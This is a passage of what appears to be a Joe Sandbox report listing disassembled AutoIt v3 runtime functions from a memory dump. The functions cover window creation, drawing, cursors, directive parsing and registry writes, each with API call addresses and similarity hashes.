                                      • GetDesktopWindow.USER32 ref: 00459581
                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                      • _wcslen.LIBCMT ref: 00459916
                                      • _wcscpy.LIBCMT ref: 0045993A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                      • GetDC.USER32(00000000), ref: 004599FC
                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 4040870279-2373415609
                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                      Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                      • SelectObject.GDI32(?,?), ref: 00441874
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                      • DeleteObject.GDI32(?), ref: 004418D5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                      • FillRect.USER32(?,?,?), ref: 00441970
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                      • String ID:
                                      • API String ID: 69173610-0
                                      • Opcode ID: 8d556d5a0fd18966a053139855cbc3485b5e0baa6df02477204c0b0fa9749797
                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                      • Opcode Fuzzy Hash: 8d556d5a0fd18966a053139855cbc3485b5e0baa6df02477204c0b0fa9749797
                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                      Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004590F2
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                      Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-3360698832
                                      • Opcode ID: f32331576ca5d7b6220a2beb2d028aab5ad6c6709b843e07dc5482f427f41384
                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                      • Opcode Fuzzy Hash: f32331576ca5d7b6220a2beb2d028aab5ad6c6709b843e07dc5482f427f41384
                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                      Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                      • SetCursor.USER32(00000000), ref: 0043075B
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                      • SetCursor.USER32(00000000), ref: 00430773
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                      • SetCursor.USER32(00000000), ref: 0043078B
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                      • SetCursor.USER32(00000000), ref: 004307A3
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                      • SetCursor.USER32(00000000), ref: 004307BB
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                      • SetCursor.USER32(00000000), ref: 004307D3
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                      • SetCursor.USER32(00000000), ref: 004307EB
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                      • SetCursor.USER32(00000000), ref: 00430803
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                      • SetCursor.USER32(00000000), ref: 0043081B
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                      • SetCursor.USER32(00000000), ref: 00430833
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                      • SetCursor.USER32(00000000), ref: 0043084B
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                      • SetCursor.USER32(00000000), ref: 00430863
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                      • SetCursor.USER32(00000000), ref: 0043087B
                                      • SetCursor.USER32(00000000), ref: 00430887
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                      • SetCursor.USER32(00000000), ref: 0043089F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Cursor$Load
                                      • String ID:
                                      • API String ID: 1675784387-0
                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                      Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                      • GetSysColor.USER32(00000012), ref: 00430933
                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                      • GetSysColor.USER32(00000011), ref: 00430979
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1582027408-0
                                      • Opcode ID: 193433f3f8e1b98160fa11060439f142fa5c6717d3ac5f1fc0b8005c8fdd6887
                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                      • Opcode Fuzzy Hash: 193433f3f8e1b98160fa11060439f142fa5c6717d3ac5f1fc0b8005c8fdd6887
                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                      Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CloseConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 3217815495-966354055
                                      • Opcode ID: 0f4c566cd1d9a6693945dcf2a379bf59af4861f489475630134aeb02386c0df3
                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                      • Opcode Fuzzy Hash: 0f4c566cd1d9a6693945dcf2a379bf59af4861f489475630134aeb02386c0df3
                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                      Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004566AE
                                      • GetDesktopWindow.USER32 ref: 004566C3
                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                      • DestroyWindow.USER32(?), ref: 00456746
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                      • CopyRect.USER32(?,?), ref: 004568BE
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                      • String ID: ($,$tooltips_class32
                                      • API String ID: 225202481-3320066284
                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                      Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                      • API String ID: 790654849-32604322
                                      • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                      • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                      Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
